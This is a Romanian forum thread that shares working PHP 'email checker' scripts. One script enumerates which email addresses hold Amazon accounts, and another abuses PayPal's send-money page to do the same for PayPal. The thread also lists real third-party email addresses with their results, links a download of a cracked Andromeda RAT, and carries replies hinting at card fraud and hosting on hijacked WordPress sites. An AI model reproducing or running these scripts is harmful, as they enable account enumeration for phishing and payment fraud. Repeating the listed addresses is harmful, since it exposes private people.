Htich Posted February 6, 2014 Report Share Posted February 6, 2014 (edited) <?phpecho/* ------------------------------------------------------------------------- # ===================================================== # # Copyright 2014 : # # cPanel # # ArHaCk # # ===================================================== # # kiinder_yo@YAHOO.COm # # ===================================================== # # The RST Group # # ===================================================== # ------------------------------------------------------------------------- */ '<html><head><title>cPanel | Amazon v2.1</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><style>body { font-size: 14px; font-family: "lucida grande", tahoma, verdana, arial, sans-serif; background: #FAFAFA;}.check { margin-top: 30px; border-radius: 4px; border: 2px solid #00345B; background: #2A6093; color: #CACACA; font-size: 16px; padding: 6px 18px; cursor: pointer;}.titulo { font-family: Arial, Helvetica, sans-serif; font-size: 70px; color: #ff2222; font-weight: bold;}.normal { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #A9A9A9;}.form { font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #00345B;; border: 1px dashed #979797;}.info input { border: 1px solid #E7E7E7; padding: 4px; width: 128px;}.texto { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #00345B;}.alerta { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #ff2222; font-size: 10px;}.valide { padding: 10px; font-size: 10px; border: 1px solid #A6D129; width: 25%; color: #367003;}.invalide { padding: 10px; font-size: 10px; border: 1px solid #EC3434; width: 25%; color: #CD0000;}.Total { padding: 10px; font-size: 10px; border: 1px solid #00345B; width: 25%; color: #2A6093;}.OFF { color: #2A6093;}.ON { color: #00345B;}#phpinfo{border: 1px solid #A9A9A9;position:fixed;padding:2px;top:1px;right:1px;font-size:12px;}.auto-style2 { text-align: center;}.auto-style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #00345B;}.auto-style4 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #2A6093;}.auto-style5 { font-family: Arial, Helvetica, sans-serif; font-size: small; color: #00345B;; border: 1px dashed #979797;}.auto-style6 { margin-top: 17px; border-radius: 4px; border: 2px solid #00345B; background: #2A6093; color: #CACACA; font-size: 16px; padding: 6px 18px; cursor: pointer;}.JOKERST { color: #00345B; text-align: center;}.K1 { text-align: left;}</style></head><body><form action="" method="post" enctype="multipart/form-data" name="form1"> <input type="hidden" name="veio" value="sim"> <tr> <br><table border="0" bordercolorlight="#" bordercolordark="#" style="border: 1px ridge #A9A9A9; width: 60%;" bgcolor="" align="center" > <td width="462" height="25" align="center" bgcolor=""> <span class="titulo"><span lang="en-us"><font size="5" color="#00345B"> <br>AM</font><font size="5" color="#2A6093">aZOn <sup style="font-size: 10px;left: -8px;position: relative;top: -0px;"> v2.1<br> </sup></font></span></span> </td> <tr> <td height="146" colspan="2" valign="top" class="auto-style2"><br> <span class="auto-style3">[# </span> <span class="auto-style4">Enter Email list to check</span><span class="auto-style3">~]#</span><span class="texto">';$emails = $_POST['emails'];print ' <br> <br></span> <textarea name="emails" style="width:76%; height: 195px;" wrap="VIRTUAL" class="auto-style5" id="emails">'.$emails.'</textarea> </td> <tr> <td colspan="2" valign="top" class="auto-style2"><br> <button class="auto-style6">ChECk</button> </td> <tr> <td height="15" align="center" bgcolor=""><span class="ON"><br><br>Codet By</span> <span class="OFF">JOkEr<span class="ON">7</span></span></td> </tr> </table> </form></body> ';$emails = $_POST['emails'];// J O K E R 7if (!empty($emails)) {$emails = explode("\n", $emails);$yes = 0;$not = 0;$inv = 0;$count = 1;print '<table border="0" bordercolorlight="#" bordercolordark="#" style="border: 1px ridge #A9A9A9; width: 60%;" bgcolor="" align="center" > <td align="center" bgcolor=""> <p align=\"left\"><font color=\"00345B\">Checking <font color=\"#2A6093\">'.count($emails).'</font> Email ....</font></p><p align=\"left\">';foreach ( $emails as $email ) { $email = trim($email); print "<div class='K1'><font>$count - </font><font class='ON'>Checking <font class='OFF'> ".$email."</font> ....</font>"; $count++; if(filter_var($email, FILTER_VALIDATE_EMAIL)){ $cPanel = @file_get_contents('https://www.amazon.com/ap/register?_encoding=UTF8&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dgno_newcust?&email='.$email.'') or Die('<b><font color="#FF0000">Server Error - Can\'t Check </font></b>'); if(!strpos($cPanel, "You indicated you")) { print "<font color=\"#821B1B\"> No</font><br>"; $not++; $vaild_no .=$email."\n"; } else { print "<font color=\"#2B702B\"> Yes</font> <br>"; $yes++; $vaild_yes .=$email."\n"; } }}// J O K E R 7print '</div ></td></table><p><table border="0" bordercolorlight="#" bordercolordark="#" style="border: 1px ridge #A9A9A9; width: 60%;" bgcolor="" align="center" > <td align="center" bgcolor=""><p><font class="OFF">NuMbEr Of EmAiLs AvaiLaBLe : </font><font color="#2B702B">'.$yes.'</font><br><font class="OFF">NuMbEr Of EmAiLs NoT AvaiLaBLe : </font><font color="#821B1B">'.$not.'</font></p></td></table><p>';// J O K E R 7print '<p><table border="0" bordercolorlight="#" bordercolordark="#" style="border: 1px ridge #A9A9A9; width: 60%;" bgcolor="" align="center" > <tr><td class="JOKERST">AvaiLaBLe (<font color="#2B702B">'.$yes.'</font>)</td><td class="JOKERST">Not AvaiLaBLe (<font color="#821B1B">'.$not.'</font>)</td></tr><tr><td class="auto-style2"><textarea rows="10" name="S1" cols="43" class="auto-style5">'.$vaild_yes.'</textarea><br><br></td><td class="auto-style2"><textarea rows="10" name="S2" cols="43" class="auto-style5">'.$vaild_no.'</textarea><br><br></td></tr></table></p><br> <table border="0" bordercolorlight="#" bordercolordark="#" style="border: 1px ridge #A9A9A9; width: 60%;" bgcolor="" align="center" > <tr><td align="center" bgcolor="" style="width: 462px"><span class="ON"><br>Codet By</span> <span class="OFF">JOkEr<span class="ON">7</span></span></td></tr><td height="25" align="center" bgcolor="" style="width: 462px"><span class="titulo"><span lang="en-us"><font size="5" color="#00345B"><br>JOk</font><font size="5" color="#2A6093">Er7 <sup style="font-size: 10px;left: -8px;position: relative;top: -0px;">.SP<br><br><br></sup></font></span></span></td></table>';/* ------------------------------------------------------------------------- # ===================================================== # # Copyright 2014 : # # J O K E R 7 # # ArHaCk # # ===================================================== # # [url]http://www.checker-sp.com[/url] # # ===================================================== # # [url]http://www.arhack.et/vb/[/url] # # ===================================================== # ------------------------------------------------------------------------- */}?>iti va spune ce mail este de amazon ! Edited March 7, 2014 by Htich 1 Quote Link to comment Share on other sites More sharing options...
Htich Posted February 9, 2014 Author Report Share Posted February 9, 2014 (edited) 1 - Checking pagamenti.notek@gmail.com .... No2 - Checking info@patventicinque.com .... No3 - Checking piizziclaudio@libero.it .... Yes 4 - Checking movidastore@gmail.com .... Yes 5 - Checking info@giordanoshop.com .... No6 - Checking paypal@marcopoloshop.it .... No7 - Checking info@tricaricoferramenta.it .... Yes 8 - Checking eurostore07@yahoo.it .... Yes 9 - Checking planetitaly.eusnc@libero.it .... No10 - Checking michaelstormz@yahoo.com .... Yes 11 - Checking tuttoavon@gmail.com .... No--- La testat careva...ceva replay ? e careva multumit de script ? pe viitor o sa vina si unu de paypal sau ce cereri mi se ofera ! Edited February 9, 2014 by Htich Quote Link to comment Share on other sites More sharing options...
florinul Posted February 10, 2014 Report Share Posted February 10, 2014 pentru ce e asta? ca nu ma princep cu amazon cu nujtiu ce ? Verifcator pentru o lista de email daca are cont pe amazon sau nu ? Quote Link to comment Share on other sites More sharing options...
Htich Posted February 10, 2014 Author Report Share Posted February 10, 2014 Da , iti spune ce mail este inregistrat la amazon.Asa poti sa faci o sortare. Quote Link to comment Share on other sites More sharing options...
florinul Posted February 10, 2014 Report Share Posted February 10, 2014 am inteles mersi ... Quote Link to comment Share on other sites More sharing options...
eromaster16 Posted February 11, 2014 Report Share Posted February 11, 2014 Da Functioneaza perfect Quote Link to comment Share on other sites More sharing options...
vossen Posted February 12, 2014 Report Share Posted February 12, 2014 E ok . Like Quote Link to comment Share on other sites More sharing options...
babyface Posted March 7, 2014 Report Share Posted March 7, 2014 bun..chiar aveam nevoie..ms Quote Link to comment Share on other sites More sharing options...
florinul Posted March 8, 2014 Report Share Posted March 8, 2014 mie nu imi merge am facut fisier .html l-am urcat pe host nimica ,apoi l-am facut si php si tot nimic ori se copie codu de aiurea Quote Link to comment Share on other sites More sharing options...
zin0 Posted March 8, 2014 Report Share Posted March 8, 2014 asteptam si cel de paypal Quote Link to comment Share on other sites More sharing options...
Htich Posted March 8, 2014 Author Report Share Posted March 8, 2014 mie nu imi merge am facut fisier .html l-am urcat pe host nimica ,apoi l-am facut si php si tot nimic ori se copie codu de aiureaAi incercat sa-l pui pe alt host ? Quote Link to comment Share on other sites More sharing options...
Aerosol Posted March 14, 2014 Report Share Posted March 14, 2014 bun . bravo ! Quote Link to comment Share on other sites More sharing options...
florinul Posted April 2, 2014 Report Share Posted April 2, 2014 am incercat pe mai multe hosturi si tot nu merge. Il pun .php nu ? adica copii textul intr-un fisier .php si apoi url http://host/fisier.php? Quote Link to comment Share on other sites More sharing options...
Htich Posted April 3, 2014 Author Report Share Posted April 3, 2014 am incercat pe mai multe hosturi si tot nu merge. Il pun .php nu ? adica copii textul intr-un fisier .php si apoi url http://host/fisier.php?Da ..Uploadezi fisierul cu extensia .php pe un host ( adica copiezi sursa postata de mine intr-un amazon.txt, pe urma il modifici in amazon.php , il urci pe site exemplu : www.site.com/amazon.php )THE END! Quote Link to comment Share on other sites More sharing options...
sleed Posted April 3, 2014 Report Share Posted April 3, 2014 Bun cu scriptul asta, acum cei cu CC-rile , CVW2 etc, freshuri de prin Australia de banane si menta, vor face o gramada de chestii.. Bun si pentru zona valcea.. Quote Link to comment Share on other sites More sharing options...
Htich Posted April 3, 2014 Author Report Share Posted April 3, 2014 Bun si pentru zona valcea..Hackerville ) Quote Link to comment Share on other sites More sharing options...
doiulyka Posted June 10, 2014 Report Share Posted June 10, 2014 Ce anume trebuie sa mai instalez la php sa functioneze? nu imi dau seama.. aveam ceva gen care folosea curl. Imi apare pagina alba. Quote Link to comment Share on other sites More sharing options...
teneriffe Posted June 14, 2014 Report Share Posted June 14, 2014 nu functioneste. Cica beleaua ar fi aici:$cPanel = @file Quote Link to comment Share on other sites More sharing options...
call911 Posted June 30, 2014 Report Share Posted June 30, 2014 Parse error: syntax error, unexpected '=', expecting ']' in /home/bengrine/public_html/wp-admin/amazon.php on line 220 Quote Link to comment Share on other sites More sharing options...
Htich Posted June 30, 2014 Author Report Share Posted June 30, 2014 Parse error: syntax error, unexpected '=', expecting ']' in /home/bengrine/public_html/wp-admin/amazon.php on line 220Incearca pe alt wordpress sau pe alt host/shell. Quote Link to comment Share on other sites More sharing options...
tur334vl Posted July 2, 2014 Report Share Posted July 2, 2014 Uite aici unu de paypal care si merge testat de mine !Poate tu o sa il faci mai bine ...Paypal Email Checker By 1mp4ct_404 Quote Link to comment Share on other sites More sharing options...
call911 Posted July 2, 2014 Report Share Posted July 2, 2014 Uite aici unu de paypal care si merge testat de mine !Poate tu o sa il faci mai bine ...Nu e bun , la orice mail da Yes. Quote Link to comment Share on other sites More sharing options...
nein Posted July 3, 2014 Report Share Posted July 3, 2014 1. Checking matanpizdatesthardcoreofutemdeiizboarafloci@yahoo.com ..... NO ))))))))) eu nu cred si am bagat unu active si o mers Quote Link to comment Share on other sites More sharing options...
marckyy Posted July 3, 2014 Report Share Posted July 3, 2014 Amazon e un site unde poti cumpara orice cu cardul...paypal e o platforma de plati online...tot cu carduri, conturi bancare..suna a frauda nu ? De fapt aveti mai multe conturi si vreti sa le testati sau faceti phising ? Un admin pe aici ? Quote Link to comment Share on other sites More sharing options...
tur334vl Posted July 3, 2014 Report Share Posted July 3, 2014 (edited) Nu e bun , la orice mail da Yes.Am facut rost si de sursa lui:eu il am testat cu mailurile mele pe care am paypal si pe care nu am si imi aratat exact <?php @set_time_limit(0); function curl($url='',$var='',$Follow=False){ global $set; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31'); curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt'); curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt'); curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt'); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); if ($Follow !== False) { curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); } $result = curl_exec($curl); curl_close($curl); return $result; } echo "<head> <style type=\"text/css\"><!-- body { font-family: 'Open Sans', sans-serif; font-size:13px} hr {border:inset 1px #E5E5E5} #form-container { border: solid 1px #ddd; border-radius:10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; box-shadow: 0px 0px 15px #888; -moz-box-shadow: 0px 0px 15px #888; -webkit-box-shadow: 0px 0px 15px #888; margin:30px auto; padding:10px; width:910px; text-shadow: 1px 1px 4px rgba(0,0,0,0.3); } #form-container1 { border: solid 1px #ddd; border-radius:10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; box-shadow: 0px 0px 15px #888; -moz-box-shadow: 0px 0px 15px #888; -webkit-box-shadow: 0px 0px 15px #888; margin:30px auto; padding:10px; width:280px; text-shadow: 1px 1px 4px rgba(0,0,0,0.3); } input[type=text], textarea { background:#fff; border:solid 1px #E5E5E5; border-radius:5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; } textarea { width:100%;height:200px; resize:none } input[type=text] { width:160px;text-align:center } input[type=text]:focus, textarea:focus { background:#EDF3FC; border:solid 1px #D5E3F9; } .submit-button { background: #57A02C; border:solid 1px #57A02C; border-radius:5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; -moz-box-shadow: 0 1px 3px rgba(0,0,0,0.6); -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.6); text-shadow: 0 -1px 1px rgba(0,0,0,0.25); border-bottom: 1px solid rgba(0,0,0,0.25); position: relative; color:#FFF; display: inline-block; cursor:pointer; font-size:13px; padding:3px 8px; } .submit-button:hover { background:#82D051;border:solid 1px #86CC50; } .table { border: solid 1px #ddd; border-radius:10px; -moz-border-radius: 5px; -webkit-border-radius: 5px; padding-left:10px; } .unverified { color:#800000; font-weight: bold; } .business{ color:yellow; font-weight: bold; } .premier{ color:#00FF00; font-weight: bold; } .verified{ color:#800080; font-weight: bold; } .nolog{ font-size: 10px; font: red; } --></style> <title>Valid Email Checker By Sniper</title> </head><div align=\"center\"></center>"; $emails = $_POST['emails']; print '<div id="form-container"> <form method="POST"> <p align="center"><font face="Times New Roman" size="6">PayPal Valid Email Checker<br> Sniper</font></p> <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p> <p><input class="submit-button" type="submit" value="Submit" name="B1"></p> </form> </div>'; if (!empty($emails)) { $emails = explode("\r\n", $emails); $yes = 0; $not = 0; $inv = 0; $count = 1; print "<p align=\"left\">Checking <font color=\"#000000\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">"; foreach ( $emails as $email ) { $email = trim($email); print $count .". Checking <b><font color=\"#000000\">".$email."</font> ..... </b>"; $count++; if(filter_var($email, FILTER_VALIDATE_EMAIL)){ $_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=Sniper.ro¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE); if(!strpos($_CheckAction, "region")) { print "<font size=\"3\" color=\"#006600\">Yes</font> <br>"; $yes++; $vaild_yes .=$email."\n"; } else { print "<font color=\"#FF0000\">NO</font><br>"; $not++; $vaild_no .=$email."\n"; } } else { print "<font color=\"#FF0000\">Invaild email</font><br>"; $inv++; $invaild .=$email."\n"; } } print '<p><table border="0" width="100%"> <tr> <td><p align="center"><font face="Times New Roman" size="4">PayPal emails</font> <b>(<font color="#006600"><b>'.$yes.'</b></font>)</b> </p></td> <td><p align="center"><font face="Times New Roman" size="4">Not PayPal emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td> <td><p align="center"><font face="Times New Roman" size="4">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td> </tr> <tr> <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td> <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td> <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td> </tr> </table></p>'; } ?><p> </p> <p>Copyright © <span class="auto-style8">2013 </span></p> <p><span class="auto-style8">Sniper</span>Plus un rat cred ca e nu stiu il am gasit unde am gasit si scriptul :http://www.rsadata.info/bot/Andromeda%20v2.06%20Cracked%20by%20TOW.zip Edited July 3, 2014 by tur334vl Quote Link to comment Share on other sites More sharing options...